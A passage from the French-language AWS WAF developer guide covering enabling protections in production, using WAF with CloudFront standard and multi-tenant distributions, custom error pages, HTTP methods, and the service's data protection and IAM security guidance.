aws wafv2 get-sampled-requests \
  --web-acl-arn webACL ARN \
  --rule-metric-name Metric name of the rule in the managed rule group \
  --scope=REGIONAL or CLOUDFRONT \
  --time-window StartTime=UTC timestamp,EndTime=UTC timestamp \
  --max-items 100
```

# Activer vos protections en production
<a name="web-acl-testing-enable-production"></a>

Cette section fournit des instructions pour activer vos protections personnalisées en production.

Lorsque vous avez terminé la dernière étape de test et de réglage de votre environnement de production, activez vos protections en mode production.

**Risque lié au trafic de production**  
Avant de déployer l'implémentation de votre pack de protection (ACL Web) pour le trafic de production, testez-la et ajustez-la dans un environnement de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et réglez-le également en mode comptage avec votre trafic de production avant d'activer vos protections pour le trafic de production. 

**Note**  
Pour suivre les instructions de cette section, vous devez comprendre de manière générale comment créer et gérer des AWS WAF protections telles que des packs de protection (Web ACLs), des règles et des groupes de règles. Ces informations sont abordées dans les sections précédentes de ce guide.

Effectuez ces étapes d'abord dans votre environnement de test, puis en production.

**Activez vos AWS WAF protections en production**

1. 

**Passez à vos protections de production**

   Mettez à jour votre pack de protection (ACL Web) et modifiez vos paramètres pour la production. 

   1. 

**Supprimez toutes les règles de test dont vous n'avez pas besoin**

      Si vous avez ajouté des règles de test dont vous n'avez pas besoin en production, supprimez-les. Si vous utilisez des règles de correspondance d'étiquettes pour filtrer les résultats des règles de groupes de règles gérés, veillez à les laisser en place. 

   1. 

**Passez aux actions de production**

      Modifiez les paramètres d'action de vos nouvelles règles en fonction des paramètres de production prévus. 
      + **Règle définie dans le pack de protection (ACL Web)** : modifiez les règles du pack de protection (ACL Web) et remplacez leurs actions par Count des actions de production. 
      + **Groupe de règles** : dans la configuration du groupe de règles dans votre pack de protection (ACL Web), changez les règles pour qu'elles utilisent leurs propres actions ou laissez-leur la Count priorité sur les actions, en fonction des résultats de vos activités de test et de réglage. Si vous utilisez une règle de correspondance d'étiquettes pour filtrer les résultats d'une règle de groupe de règles, veillez à laisser la dérogation à cette règle en place. 

        Pour passer à l'utilisation de l'action d'une règle, dans la configuration de votre pack de protection (ACL Web), modifiez l'énoncé de règle pour le groupe de règles et supprimez la Count dérogation pour la règle. Si vous gérez le pack de protection (ACL Web) au format JSON, dans la déclaration de référence du groupe de règles, supprimez l'entrée correspondant à la règle de la `RuleActionOverrides` liste. 
      + **pack de protection (ACL Web)** : si vous avez modifié l'action par défaut du pack de protection (ACL Web) pour vos tests, passez à son paramètre de production. 

      Avec ces paramètres, vos nouvelles protections géreront le trafic Web comme vous le souhaitez. 

   Lorsque vous enregistrez votre pack de protection (ACL Web), les ressources auxquelles il est associé utilisent vos paramètres de production. 

1. 

**Surveiller et régler**

   Pour vous assurer que les requêtes Web sont traitées comme vous le souhaitez, surveillez attentivement votre trafic après avoir activé la nouvelle fonctionnalité. Vous surveillerez les métriques et les journaux relatifs à vos actions relatives aux règles de production, au lieu du nombre d'actions que vous surveilliez dans le cadre de vos travaux de réglage. Continuez à surveiller et ajustez le comportement selon les besoins pour vous adapter à l'évolution de votre trafic Web. 

# Utilisation AWS WAF avec Amazon CloudFront
<a name="cloudfront-features"></a>

Découvrez comment utiliser les CloudFront fonctionnalités AWS WAF d'Amazon.

Lorsque vous créez un pack de protection (ACL Web), vous pouvez spécifier une ou plusieurs CloudFront distributions que vous AWS WAF souhaitez inspecter. CloudFront prend en charge deux types de distributions : les distributions standard qui protègent les locataires individuels et les distributions multi-locataires qui protègent plusieurs locataires via un modèle de configuration unique et partagé. AWS WAF inspecte les requêtes Web pour les deux types de distribution en fonction des règles que vous définissez dans vos packs de protection (Web ACLs), avec des modèles d'implémentation différents pour chaque type.

**Topics**
+ [Comment AWS WAF fonctionne avec les différents types de distribution](#cloudfront-features-distribution-types)
+ [Utilisation AWS WAF avec des plans CloudFront de tarification forfaitaires](#waf-cf-pricing-plans)
+ [Cas d'utilisation courants pour protéger les CloudFront distributions avec AWS WAF](cloudfront-waf-use-cases.md)

## Comment AWS WAF fonctionne avec les différents types de distribution
<a name="cloudfront-features-distribution-types"></a>

### Types de distribution
<a name="distribution-types-overview"></a>

AWS WAF fournit des fonctionnalités de pare-feu d'applications Web pour les CloudFront distributions de distribution standard et multi-locataires.

#### Distributions standard
<a name="standard-distribution-overview"></a>

Pour les distributions standard, AWS WAF ajoute une protection à l'aide d'un pack de protection unique (ACL Web) pour chaque distribution. Vous pouvez activer cette protection en associant un pack de protection existant (ACL Web) à une CloudFront distribution ou en utilisant la protection en un clic dans la CloudFront console. Cela vous permet de gérer les contrôles de sécurité pour chacune de vos distributions indépendamment, car toute modification apportée à un pack de protection (ACL Web) n'affectera que la distribution qui lui est associée.

Cette méthode simple de protection des CloudFront distributions est optimale pour fournir à des domaines individuels des protections spécifiques à partir d'un seul pack de protection (ACL Web).

##### Considérations relatives à la distribution standard
<a name="standard-waf-considerations"></a>
+ Les modifications apportées à un pack de protection (ACL Web) affectent uniquement sa distribution associée
+ Chaque distribution nécessite une configuration de pack de protection (ACL Web) indépendante
+ Les règles et les groupes de règles sont gérés séparément pour chaque distribution

#### Distributions entre locataires
<a name="tenant-distribution-overview"></a>

Pour les distributions multi-locataires, AWS WAF renforce la protection sur plusieurs domaines à l'aide d'un seul pack de protection (ACL Web). Les domaines gérés par des distributions multi-locataires sont appelés locataires de distribution. Vous ne pouvez activer AWS WAF la protection des distributions mutualisées que dans la CloudFront console, pendant ou après le processus de création des distributions mutualisées. Cependant, les modifications apportées à un pack de protection (ACL Web) sont toujours gérées via la AWS WAF console ou l'API. 

Les distributions multi-locataires offrent la flexibilité nécessaire pour permettre AWS WAF des protections à deux niveaux :
+ **Niveau de distribution mutualisé** : les packs de protection associés (Web ACLs) fournissent des contrôles de sécurité de base qui s'appliquent à toutes les applications partageant cette distribution
+ **Niveau du locataire de distribution** : les locataires individuels d'une distribution multi-locataires peuvent disposer de leurs propres packs de protection (Web ACLs) pour mettre en œuvre des contrôles de sécurité supplémentaires ou annuler les paramètres de distribution multi-locataires

Ces deux niveaux rendent les distributions multi-locataires optimales pour partager les AWS WAF protections entre plusieurs domaines sans perdre la possibilité de personnaliser la sécurité pour une distribution individuelle. 

#### Considérations relatives à la distribution entre locataires
<a name="tenant-waf-considerations"></a>
+ Les locataires de distribution individuels héritent des modifications apportées aux packs de protection (Web ACLs) associés aux distributions mutualisées associées
+ Les packs de protection (Web ACLs) associés à des locataires de distribution spécifiques peuvent remplacer les paramètres configurés au niveau du pack de protection multi-locataires (ACL Web)
+ Les groupes de règles gérés peuvent être mis en œuvre à la fois au niveau de la distribution et au niveau du locataire de distribution
+ Les identifiants des applications peuvent être localisés dans les journaux pour suivre les événements de sécurité par distribution

### AWS WAF fonctionnalités par type de distribution
<a name="distribution-types-comparison"></a>


**Comparaison des implémentations de packs de protection (ACL Web)**  

| AWS WAF Fonctionnalité | Distributions standard | Distributions entre locataires | 
| --- | --- | --- | 
| Associer des packs de protection (Web ACLs) | Un pack de protection (ACL Web) par distribution | Vous pouvez partager des packs de protection (Web ACLs) entre les locataires, avec des packs de protection spécifiques optionnels (Web) ACLs | 
| Gestion des règles | Les règles concernent une distribution unique | Les règles de distribution multi-locataires affectent tous les locataires associés ; les règles de distribution spécifiques au locataire n'affectent que ce locataire | 
| Groupes de règles gérés | Appliqué aux distributions individuelles | Peut être appliqué au niveau de la distribution multi-locataires pour tous les locataires ou au niveau du locataire pour des applications spécifiques | 
| Logging |  AWS WAF Journaux standard | Les journaux incluent les identifiants des locataires pour l'attribution des événements de sécurité | 

## Utilisation AWS WAF avec des plans CloudFront de tarification forfaitaires
<a name="waf-cf-pricing-plans"></a>

CloudFront les plans tarifaires forfaitaires combinent le réseau CloudFront mondial de diffusion de contenu (CDN) Amazon avec plusieurs Services AWS fonctionnalités dans un prix mensuel sans frais d'excédent, indépendamment des pics de trafic ou des attaques.

Les plans tarifaires forfaitaires incluent Services AWS les fonctionnalités suivantes pour un prix mensuel simple :
+ CloudFront CDN
+ AWS WAF et protection DDo S
+ Gestion et analyse des bots
+ DNS d'Amazon Route 53
+ Ingestion d'Amazon CloudWatch Logs
+ Certificat TLS
+ Calcul périphérique sans serveur
+ Crédits de stockage Amazon S3 par mois

Les plans sont disponibles aux niveaux Free, Pro, Business et Premium pour répondre aux besoins de votre application. Les forfaits ne nécessitent pas d'engagement annuel pour obtenir les meilleurs tarifs disponibles. Commencez par le plan gratuit et passez à une mise à niveau pour accéder à davantage de fonctionnalités et à des limites d'utilisation plus importantes.

Pour plus d'informations et une liste complète des forfaits et fonctionnalités, consultez les [plans tarifaires CloudFront forfaitaires](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/flat-rate-pricing-plan.html) dans le manuel *Amazon CloudFront Developer Guide*.

**Important**  
Un pack de AWS WAF protection valide (ACL Web) doit rester associé à votre CloudFront distribution, quel que soit le plan tarifaire utilisé. Vous ne pouvez pas supprimer l'association du pack de protection (ACL Web) à moins de revenir à la pay-as-you-go tarification.  
Bien qu'une ACL AWS WAF Web doive rester associée à votre distribution, vous conservez le contrôle total de votre configuration de sécurité. Vous pouvez personnaliser votre protection en ajustant les règles activées ou désactivées dans votre ACL Web, et en modifiant les paramètres des règles en fonction de vos exigences de sécurité. Pour plus d'informations sur la gestion des règles ACL Web, consultez la section [AWS WAF Règles](https://docs.aws.amazon.com/waf/latest/developerguide/waf-rules.html).

# Cas d'utilisation courants pour protéger les CloudFront distributions avec AWS WAF
<a name="cloudfront-waf-use-cases"></a>

Les AWS WAF fonctionnalités suivantes fonctionnent de la même manière pour toutes les CloudFront distributions. Les considérations relatives aux distributions multi-locataires sont répertoriées après chaque scénario de fonctionnalité.

## Utilisation AWS WAF avec des pages d'erreur CloudFront personnalisées
<a name="cloudfront-features-custom-error-pages"></a>

Par défaut, lorsque vous AWS WAF bloquez une requête Web en fonction des critères que vous spécifiez, elle renvoie le code `403 (Forbidden)` d'état HTTP à et le CloudFront renvoie au lecteur. CloudFront Le visualiseur affiche ensuite un message par défaut bref et peu formaté, semblable au suivant :

```
Forbidden: You don't have permission to access /myfilename.html on this server.
```

Vous pouvez annuler ce comportement dans les règles de votre pack de AWS WAF protection (ACL Web) en définissant des réponses personnalisées. Pour plus d'informations sur la personnalisation du comportement des réponses à l'aide de AWS WAF règles, consultez[Envoi de réponses personnalisées pour les Block actions](customizing-the-response-for-blocked-requests.md).

**Note**  
Les réponses que vous personnalisez à l'aide de AWS WAF règles ont priorité sur les spécifications de réponse que vous définissez dans les pages d'erreur CloudFront personnalisées.

Si vous préférez afficher un message d'erreur personnalisé CloudFront, éventuellement en utilisant le même format que le reste de votre site Web, vous pouvez configurer CloudFront pour renvoyer au lecteur un objet (par exemple, un fichier HTML) contenant votre message d'erreur personnalisé.

**Note**  
CloudFront Impossible de faire la distinction entre un code d'état HTTP 403 renvoyé par votre origine et un code renvoyé AWS WAF lorsqu'une requête est bloquée. Par conséquent, vous ne pouvez pas renvoyer différentes pages d'erreur personnalisées en fonction des différentes causes d'un code de statut HTTP 403.

Pour plus d'informations sur les pages d'erreur CloudFront personnalisées, consultez la section [Génération de réponses d'erreur personnalisées](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/GeneratingCustomErrorResponses.html) dans le manuel *Amazon CloudFront Developer Guide*.

### Pages d'erreur personnalisées dans les distributions multi-locataires
<a name="custom-error-pages-template-distributions"></a>

Pour les distributions CloudFront multi-locataires, vous pouvez configurer des pages d'erreur personnalisées de la manière suivante :
+ Au niveau du multi-tenant : ces paramètres s'appliquent à toutes les distributions de locataires qui utilisent le modèle de distribution multi-locataires
+ Par le biais de AWS WAF règles : les réponses personnalisées définies dans les packs de protection (Web ACLs) ont priorité à la fois sur la distribution multi-locataires et sur les pages d'erreur personnalisées au niveau des locataires

## Utilisation AWS WAF de with CloudFront pour les applications exécutées sur votre propre serveur HTTP
<a name="cloudfront-features-your-own-http-server"></a>

Lorsque vous utilisez AWS WAF avec CloudFront, vous pouvez protéger vos applications exécutées sur n'importe quel serveur Web HTTP, qu'il s'agisse d'un serveur Web exécuté dans Amazon Elastic Compute Cloud EC2 (Amazon) ou d'un serveur Web que vous gérez en privé. Vous pouvez également configurer CloudFront pour exiger le protocole HTTPS entre CloudFront et votre propre serveur Web, ainsi qu'entre les utilisateurs et CloudFront.

**Exiger le protocole HTTPS entre CloudFront et votre propre serveur Web**  
Pour exiger le protocole HTTPS entre votre propre serveur Web CloudFront et votre propre serveur Web, vous pouvez utiliser la fonctionnalité d'origine CloudFront personnalisée et configurer la **politique du protocole d'origine** et les paramètres du **nom de domaine d'origine** pour des origines spécifiques. Dans votre CloudFront configuration, vous pouvez spécifier le nom DNS du serveur ainsi que le port et le protocole que vous souhaitez utiliser CloudFront pour récupérer des objets depuis votre origine. Vous devez également vous assurer que le SSL/TLS certificat de votre serveur d'origine personnalisé correspond au nom de domaine d'origine que vous avez configuré. Lorsque vous utilisez votre propre serveur Web HTTP en dehors de AWS, vous devez utiliser un certificat signé par une autorité de certification (CA) tierce de confiance, par exemple Comodo ou DigiCert Symantec. Pour plus d'informations sur l'exigence du protocole HTTPS pour les communications entre votre propre serveur Web CloudFront et votre propre serveur Web, consultez la rubrique [Exiger le protocole HTTPS pour la communication entre CloudFront et votre origine personnalisée](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https-cloudfront-to-custom-origin.html) dans le manuel *Amazon CloudFront Developer Guide*.

**Exiger le protocole HTTPS entre un utilisateur et CloudFront**  
Pour exiger le protocole HTTPS entre les spectateurs et CloudFront, vous pouvez modifier la **politique du protocole de visionnage** pour un ou plusieurs comportements de cache dans votre CloudFront distribution. Pour plus d'informations sur l'utilisation du protocole HTTPS entre utilisateurs CloudFront, consultez la rubrique Requirement [du protocole HTTPS pour la communication entre utilisateurs et CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https-viewers-to-cloudfront.html) dans le manuel *Amazon CloudFront Developer Guide*. Vous pouvez également apporter votre propre certificat SSL afin que les utilisateurs puissent se connecter à votre CloudFront distribution via HTTPS en utilisant votre propre nom de domaine, par exemple *https://www.mysite.com*. Pour plus d'informations, consultez la rubrique [Configuration des noms de domaine alternatifs et du protocole HTTPS](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/cnames-and-https-procedures.html) dans le manuel *Amazon CloudFront Developer Guide*.

Pour les distributions multi-locataires, les configurations des méthodes HTTP suivent cette hiérarchie :
+ Les paramètres au niveau du modèle définissent les méthodes HTTP de base autorisées pour toutes les distributions mutualisées
+ Les distributions des locataires peuvent remplacer ces paramètres pour :
  + Autoriser moins de méthodes que la distribution multi-locataires (utilisation de AWS WAF règles pour bloquer des méthodes supplémentaires)
  + Autoriser davantage de méthodes si la distribution multi-locataires est configurée pour les prendre en charge
+ AWS WAF les règles au niveau de la distribution multi-locataires et au niveau du locataire peuvent restreindre davantage les méthodes HTTP, quelle que soit la configuration CloudFront 

## Choix des méthodes HTTP qui CloudFront répondent à
<a name="cloudfront-features-allowed-http-methods"></a>

Lorsque vous créez une distribution CloudFront Web Amazon, vous choisissez les méthodes HTTP que vous CloudFront souhaitez traiter et transmettre à votre source. Choisissez parmi les options suivantes :
+ **`GET`, `HEAD`** — Vous ne pouvez l'utiliser CloudFront que pour récupérer des objets depuis votre origine ou pour obtenir des en-têtes d'objets.
+ **`GET`,`HEAD`, `OPTIONS`** — Vous CloudFront ne pouvez l'utiliser que pour obtenir des objets depuis votre origine, obtenir des en-têtes d'objets ou récupérer une liste des options prises en charge par votre serveur d'origine.
+ **`GET`,`HEAD`,,`OPTIONS`,`PUT`, `POST``PATCH`, `DELETE`** — Vous pouvez l'utiliser CloudFront pour obtenir, ajouter, mettre à jour et supprimer des objets, ainsi que pour obtenir des en-têtes d'objets. En outre, vous pouvez effectuer d'autres `POST` opérations, telles que l'envoi de données à partir d'un formulaire Web.

Vous pouvez également utiliser des instructions de règle de correspondance des AWS WAF octets pour autoriser ou bloquer les demandes en fonction de la méthode HTTP, comme décrit dans[Instruction de correspondance de chaîne de règle](waf-rule-statement-type-string-match.md). Si vous souhaitez utiliser une combinaison de méthodes compatibles CloudFront , telles que `GET` et`HEAD`, vous n'avez pas besoin de configurer AWS WAF pour bloquer les demandes utilisant les autres méthodes. Si vous souhaitez autoriser une combinaison de méthodes non CloudFront compatibles, telles que, et `GET` `HEAD``POST`, vous pouvez configurer CloudFront pour répondre à toutes les méthodes, puis utiliser AWS WAF pour bloquer les demandes utilisant d'autres méthodes.

Pour plus d'informations sur le choix des méthodes qui CloudFront répondent, consultez la section [Méthodes HTTP autorisées](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html#DownloadDistValuesAllowedHTTPMethods) dans la rubrique [Valeurs que vous spécifiez lors de la création ou de la mise à jour d'une distribution Web](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html) du manuel *Amazon CloudFront Developer Guide*.

**Configurations de méthodes HTTP autorisées dans les distributions multi-locataires**  
Pour les distributions multi-locataires, les configurations de méthode HTTP définies au niveau de la distribution multi-locataires s'appliquent par défaut à toutes les distributions mutualisées. La distribution des locataires peut remplacer ces paramètres si nécessaire.
+ Si vous souhaitez utiliser une combinaison de méthodes compatibles, CloudFront telles que `GET` et`HEAD`, vous n'avez pas besoin de configurer pour AWS WAF bloquer les demandes utilisant d'autres méthodes.
+ Si vous souhaitez autoriser une combinaison de méthodes qui CloudFront ne sont pas prises en charge par défaut, telles que `GET``HEAD`, et`POST`, vous pouvez configurer CloudFront pour répondre à toutes les méthodes, puis utiliser AWS WAF pour bloquer les demandes utilisant d'autres méthodes.

Lorsque vous implémentez des en-têtes de sécurité dans des distributions multi-locataires, tenez compte des points suivants :
+ Les en-têtes de sécurité au niveau du modèle fournissent une protection de base pour toutes les distributions mutualisées
+ Les distributions aux locataires peuvent :
  + Ajouter de nouveaux en-têtes de sécurité non définis dans la distribution multi-locataires
  + Modifier les valeurs des en-têtes spécifiques au locataire
  + Impossible de supprimer ou de remplacer les en-têtes de sécurité définis au niveau de la distribution multi-locataires
+ Envisagez d'utiliser des en-têtes au niveau de la distribution à locataires multiples pour les contrôles de sécurité essentiels qui devraient s'appliquer à tous les locataires

## Considérations relatives à la
<a name="cloudfront-features-logging"></a>

Les distributions standard et multi-locataires prennent en charge la AWS WAF journalisation, mais il existe des différences importantes dans la manière dont les journaux sont structurés et gérés :


**Comparaison de journalisation**  

| Distributions standard | Distributions entre locataires | 
| --- | --- | 
| Une configuration de journal par distribution | Options de journalisation au niveau du modèle et du locataire | 
| Champs de journal standard | Champs d'identification du locataire supplémentaires | 
| Destination unique par distribution | Des destinations distinctes sont possibles pour la distribution multi-locataires et les journaux des locataires | 

## Ressources supplémentaires
<a name="cloudfront-saas-additional-resources"></a>
+ Pour en savoir plus sur les distributions multi-locataires, consultez [Configurer les distributions](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-working-with.html) dans le manuel *Amazon CloudFront Developer Guide*.
+ Pour en savoir plus sur l'utilisation AWS WAF avec CloudFront, consultez la section [Utilisation de AWS WAF la protection](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-awswaf.html) dans le manuel *Amazon CloudFront Developer Guide*.
+ Pour en savoir plus sur AWS WAF les journaux, consultez[Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).

# Sécurité lors de votre utilisation du AWS WAF service
<a name="security"></a>

Cette section explique comment le modèle de responsabilité partagée s'applique à AWS WAF.

La sécurité du cloud AWS est la priorité absolue. En tant que AWS client, vous bénéficiez d'un centre de données et d'une architecture réseau conçus pour répondre aux exigences des entreprises les plus sensibles en matière de sécurité.

**Note**  
Cette section fournit des conseils AWS de sécurité standard pour votre utilisation du AWS WAF service et de ses AWS ressources, telles que les packs de AWS WAF protection (Web ACLs) et les groupes de règles.   
Pour plus d'informations sur la protection de vos AWS ressources en utilisant AWS WAF, consultez le reste du AWS WAF guide. 

La sécurité est une responsabilité partagée entre vous AWS et vous. Le [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) décrit cette notion par les termes sécurité *du* cloud et sécurité *dans* le cloud :
+ **Sécurité du cloud** : AWS est chargée de protéger l'infrastructure qui exécute les AWS services dans le AWS Cloud. AWS vous fournit également des services que vous pouvez utiliser en toute sécurité. L’efficacité de notre sécurité est régulièrement testée et vérifiée par des auditeurs tiers dans le cadre des [programmes de conformitéAWS](https://aws.amazon.com/compliance/programs/). Pour en savoir plus sur les programmes de conformité qui s'appliquent à AWS WAF, consultez la section [AWS Services concernés par programme de conformité](https://aws.amazon.com/compliance/services-in-scope/).
+ **Sécurité dans le cloud** — Votre responsabilité est déterminée par le AWS service que vous utilisez. Vous êtes également responsable d’autres facteurs, y compris la sensibilité de vos données, les exigences de votre organisation, et la législation et la réglementation applicables. 

Cette documentation vous aide à comprendre comment appliquer le modèle de responsabilité partagée lors de son utilisation AWS WAF. Les rubriques suivantes expliquent comment procéder à la configuration AWS WAF pour atteindre vos objectifs de sécurité et de conformité. Vous apprendrez également à utiliser d'autres AWS services qui vous aident à surveiller et à sécuriser vos AWS WAF ressources. 

**Topics**
+ [Protection de vos données dans AWS WAF](data-protection.md)
+ [Utilisation d'IAM avec AWS WAF](security-iam.md)
+ [Connexion et surveillance AWS WAF](waf-incident-response.md)
+ [Validation de la conformité dans AWS WAF](waf-compliance.md)
+ [Renforcer la résilience dans AWS WAF](disaster-recovery-resiliency.md)
+ [Sécurité de l'infrastructure dans AWS WAF](infrastructure-security.md)

# Protection de vos données dans AWS WAF
<a name="data-protection"></a>

Le [modèle de responsabilité AWS partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) de s'applique à la protection des données dans AWS WAF. Comme décrit dans ce modèle, AWS est chargé de protéger l'infrastructure mondiale qui gère tous les AWS Cloud. La gestion du contrôle de votre contenu hébergé sur cette infrastructure relève de votre responsabilité. Vous êtes également responsable des tâches de configuration et de gestion de la sécurité des Services AWS que vous utilisez. Pour plus d’informations sur la confidentialité des données, consultez [Questions fréquentes (FAQ) sur la confidentialité des données](https://aws.amazon.com/compliance/data-privacy-faq/). Pour en savoir plus sur la protection des données en Europe, consultez le billet de blog [Modèle de responsabilité partagée d’AWS et RGPD (Règlement général sur la protection des données)](https://aws.amazon.com/blogs/security/the-aws-shared-responsibility-model-and-gdpr/) sur le *Blog de sécuritéAWS *.

À des fins de protection des données, nous vous recommandons de protéger les Compte AWS informations d'identification et de configurer les utilisateurs individuels avec AWS IAM Identity Center ou Gestion des identités et des accès AWS (IAM). Ainsi, chaque utilisateur se voit attribuer uniquement les autorisations nécessaires pour exécuter ses tâches. Nous vous recommandons également de sécuriser vos données comme indiqué ci-dessous :
+ Utilisez l’authentification multifactorielle (MFA) avec chaque compte.
+  SSL/TLS À utiliser pour communiquer avec AWS les ressources. Nous exigeons TLS 1.2 et recommandons TLS 1.3.
+ Configurez l'API et la journalisation de l'activité des utilisateurs avec AWS CloudTrail. Pour plus d'informations sur l'utilisation des CloudTrail sentiers pour capturer AWS des activités, consultez la section [Utilisation des CloudTrail sentiers](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-trails.html) dans le *guide de AWS CloudTrail l'utilisateur*.
+ Utilisez des solutions de AWS chiffrement, ainsi que tous les contrôles de sécurité par défaut qu'ils contiennent Services AWS.
+ Utilisez des services de sécurité gérés avancés tels qu’Amazon Macie, qui contribuent à la découverte et à la sécurisation des données sensibles stockées dans Amazon S3.
+ Si vous avez besoin de modules cryptographiques validés par la norme FIPS 140-3 pour accéder AWS via une interface de ligne de commande ou une API, utilisez un point de terminaison FIPS. Pour plus d’informations sur les points de terminaison FIPS disponibles, consultez [Norme FIPS (Federal Information Processing Standard) 140-3](https://aws.amazon.com/compliance/fips/).

Nous vous recommandons fortement de ne jamais placer d’informations confidentielles ou sensibles, telles que les adresses e-mail de vos clients, dans des balises ou des champs de texte libre tels que le champ **Nom**. Cela inclut lorsque vous travaillez avec AWS WAF ou d'autres Services AWS utilisateurs de la console, de l'API ou AWS SDKs. AWS CLI Toutes les données que vous entrez dans des balises ou des champs de texte de forme libre utilisés pour les noms peuvent être utilisées à des fins de facturation ou dans les journaux de diagnostic. Si vous fournissez une adresse URL à un serveur externe, nous vous recommandons fortement de ne pas inclure d’informations d’identification dans l’adresse URL permettant de valider votre demande adressée à ce serveur.

AWS WAF les entités, telles que les packs de protection (Web ACLs), les groupes de règles et les ensembles d'adresses IP, sont chiffrées au repos, sauf dans certaines régions où le chiffrement n'est pas disponible, notamment en Chine (Pékin) et en Chine (Ningxia). Des clés de chiffrement uniques sont utilisées pour chaque région. 

## Supprimer des AWS WAF ressources
<a name="deleting-resources"></a>

Vous pouvez supprimer les ressources que vous créez dans AWS WAF. Consultez les instructions relatives à chaque type de ressource dans les sections suivantes.
+ [Supprimer un pack de protection (ACL Web)](web-acl-deleting.md)
+ [Suppression d'un groupe de règles](waf-rule-group-deleting.md)
+ [Suppression d'un ensemble d'adresses IP](waf-ip-set-managing.md#waf-ip-set-deleting)
+ [Suppression d'un ensemble de modèles d'expression régulière](waf-regex-pattern-set-managing.md#waf-regex-pattern-set-deleting)

# Utilisation d'IAM avec AWS WAF
<a name="security-iam"></a>

Cette section explique comment utiliser IAM avec AWS WAF.



Gestion des identités et des accès AWS (IAM) est un outil Service AWS qui permet à un administrateur de contrôler en toute sécurité l'accès aux AWS ressources. Les administrateurs IAM contrôlent qui peut être *authentifié* (connecté) et *autorisé (autorisé*) à utiliser AWS WAF les ressources. IAM est un Service AWS outil que vous pouvez utiliser sans frais supplémentaires.

**Topics**
+ [Public ciblé](#security_iam_audience)
+ [Authentification par des identités](#security_iam_authentication)
+ [Gestion de l’accès à l’aide de politiques](#security_iam_access-manage)
+ [Comment AWS WAF fonctionne avec IAM](security_iam_service-with-iam.md)
+ [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md)
+ [AWS politiques gérées pour AWS WAF](security-iam-awsmanpol.md)
+ [Résolution des problèmes AWS WAF d'identité et d'accès](security_iam_troubleshoot.md)
+ [Utilisation de rôles liés à un service pour AWS WAF](using-service-linked-roles.md)

## Public ciblé
<a name="security_iam_audience"></a>

La façon dont vous utilisez Gestion des identités et des accès AWS (IAM) varie en fonction de votre rôle :
+ **Utilisateur du service** : demandez des autorisations à votre administrateur si vous ne pouvez pas accéder aux fonctionnalités (voir [Résolution des problèmes AWS WAF d'identité et d'accès](security_iam_troubleshoot.md))
+ **Administrateur du service** : déterminez l’accès des utilisateurs et soumettez les demandes d’autorisation (voir [Comment AWS WAF fonctionne avec IAM](security_iam_service-with-iam.md))
+ **Administrateur IAM** : rédigez des politiques pour gérer l’accès (voir [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md))

## Authentification par des identités
<a name="security_iam_authentication"></a>

L'authentification est la façon dont vous vous connectez à AWS l'aide de vos informations d'identification. Vous devez être authentifié en tant qu'utilisateur IAM ou en assumant un rôle IAM. Utilisateur racine d'un compte AWS

Vous pouvez vous connecter en tant qu'identité fédérée à l'aide d'informations d'identification provenant d'une source d'identité telle que AWS IAM Identity Center (IAM Identity Center), d'une authentification unique ou d'informations d'identification. Google/Facebook Pour plus d’informations sur la connexion, consultez [Connexion à votre Compte AWS](https://docs.aws.amazon.com/signin/latest/userguide/how-to-sign-in.html) dans le *Guide de l’utilisateur Connexion à AWS *.

Pour l'accès par programmation, AWS fournit un SDK et une CLI pour signer les demandes de manière cryptographique. Pour plus d’informations, consultez [Signature AWS Version 4 pour les demandes d’API](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_sigv.html) dans le *Guide de l’utilisateur IAM*.

### Compte AWS utilisateur root
<a name="security_iam_authentication-rootuser"></a>

 Lorsque vous créez un Compte AWS, vous commencez par une seule identité de connexion appelée *utilisateur Compte AWS root* qui dispose d'un accès complet à toutes Services AWS les ressources. Il est vivement déconseillé d’utiliser l’utilisateur racine pour vos tâches quotidiennes. Pour les tâches qui requièrent des informations d’identification de l’utilisateur racine, consultez [Tâches qui requièrent les informations d’identification de l’utilisateur racine](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html#root-user-tasks) dans le *Guide de l’utilisateur IAM*. 

### Identité fédérée
<a name="security_iam_authentication-federated"></a>

Il est recommandé d'obliger les utilisateurs humains à utiliser la fédération avec un fournisseur d'identité pour accéder à Services AWS l'aide d'informations d'identification temporaires.

Une *identité fédérée* est un utilisateur provenant de votre annuaire d'entreprise, de votre fournisseur d'identité Web ou Directory Service qui y accède à Services AWS l'aide d'informations d'identification provenant d'une source d'identité. Les identités fédérées assument des rôles qui fournissent des informations d’identification temporaires.

Pour une gestion des accès centralisée, nous vous recommandons d’utiliser AWS IAM Identity Center. Pour plus d’informations, consultez [Qu’est-ce que IAM Identity Center ?](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) dans le *Guide de l’utilisateur AWS IAM Identity Center *.

### Utilisateurs et groupes IAM
<a name="security_iam_authentication-iamuser"></a>

